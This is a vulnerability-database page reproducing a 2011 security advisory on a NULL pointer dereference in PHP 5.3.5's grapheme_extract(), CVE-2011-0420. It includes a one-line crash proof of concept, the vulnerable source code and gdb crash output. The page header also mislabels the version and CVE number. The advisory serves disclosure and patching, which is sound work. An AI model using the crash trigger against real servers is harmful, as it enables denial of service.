Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHP 5.2.5 grapheme_extract() NULL Pointer Dereference

🗓️ 16 Feb 2011 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

PHP 5.3.5 grapheme_extract() NULL Pointer Dereference, CVE-2011-042

Related
Code
`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]  
  
Author: Maksymilian Arciemowicz  
http://securityreason.com/  
http://cxib.net/  
Date:  
- - Dis.: 09.12.2010  
- - Pub.: 17.02.2011  
  
CVE: CVE-2011-0420  
CERT: VU#210829  
  
Affected Software:  
- - PHP 5.3.5  
  
Fixed: SVN  
  
Original URL:  
http://securityreason.com/achievement_securityalert/94  
  
  
- --- 0.Description ---  
Internationalization extension (further is referred as Intl) is a  
wrapper for ICU library, enabling PHP programmers to perform  
UCA-conformant collation and date/time/number/currency formatting in  
their scripts.  
  
grapheme_extract ? Function to extract a sequence of default grapheme  
clusters from a text buffer, which must be encoded in UTF-8.  
  
  
- --- 1. PoC for grapheme_extract() ---  
grapheme_extract('a',-1);  
  
Change length of first parameter to change rip.  
  
  
- --- 2. grapheme_extract() NULL Pointer Dereference ---  
As we can see in grapheme_extract(str,size)  
  
- -grapheme_extract()--  
...  
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char  
**)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {  
<=== str='a' and size='-1'  
...  
/* if the string is all ASCII up to size+1 - or str_len whichever is  
first - then we are done.  
(size + 1 because the size-th character might be the beginning of a  
grapheme cluster)  
*/  
  
if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 :  
str_len ) ) { <=== ( size=-1+1=0 ) ===  
long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1  
if ( NULL != next ) {  
ZVAL_LONG(next, start+nsize);  
}  
RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT  
}  
...  
- -grapheme_extract()--  
  
if we call to grapheme_ascii_check(pstr,0) where  
  
- -grapheme_ascii_check()--  
/* {{{ grapheme_ascii_check: ASCII check */  
int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0  
{  
int ret_len = len;  
while ( len-- ) {  
if ( *day++ > 0x7f )  
return -1;  
}  
  
return ret_len; <=== return 0  
}  
- -grapheme_ascii_check()--  
  
then we get (int)0 in result and  
  
long nsize = ( size < str_len ? size : str_len );  
  
will be -1. Therefore,  
  
RETURN_STRINGL(((char *)pstr), nsize, 1);  
  
give NULL pointer dereference here.  
  
Changing length of first parameter of grapheme_extract(), we will also  
change rip in memcpy(3).  
  
(gdb) r -r 'grapheme_extract('a',-1);'  
...  
(gdb) x/i $rip  
=> 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)  
(gdb) x/x $rax  
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70  
(gdb) x/x $rdi  
0x11b2000: Cannot access memory at address 0x11b2000  
(gdb) r -r  
'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);'  
...  
(gdb) x/i $rip  
=> 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10  
(gdb) x/x $rsi  
0x11b1fe8: 0x00000000  
  
- --- 3. Fix ---  
CVS  
http://svn.php.net/viewvc?view=revision&revision=306449  
  
  
- --- 4. Greets ---  
Pierre, Stas, sp3x, infospec  
  
  
- --- 5. Contact ---  
Author: Maksymilian Arciemowicz [ SecurityReason.com ]  
  
Email:  
- - cxib {a\./t]securityreason[d=t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://securityreason.com/  
http://cxib.net/  
  
- --   
Best Regards  
pub 4096R/D6E5B530 2010-09-19  
uid Maksymilian Arciemowicz (cx) <[email protected]>  
sub 4096R/58BA663C 2010-09-19  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81  
imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv  
WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU  
tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko  
PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk  
nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf  
7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9  
EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ  
TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc  
HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R  
i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN  
9aCz02ztmFBMPO+/YTzb  
=H8sm  
-----END PGP SIGNATURE-----  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Feb 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.15149
php 5.3.5grapheme_extractnull pointer dereferencecve-2011-0420securityreasonmaksymilian arciemowiczinternationalization extensionicu libraryutf-8pocasciifixgreetscontactgpg
36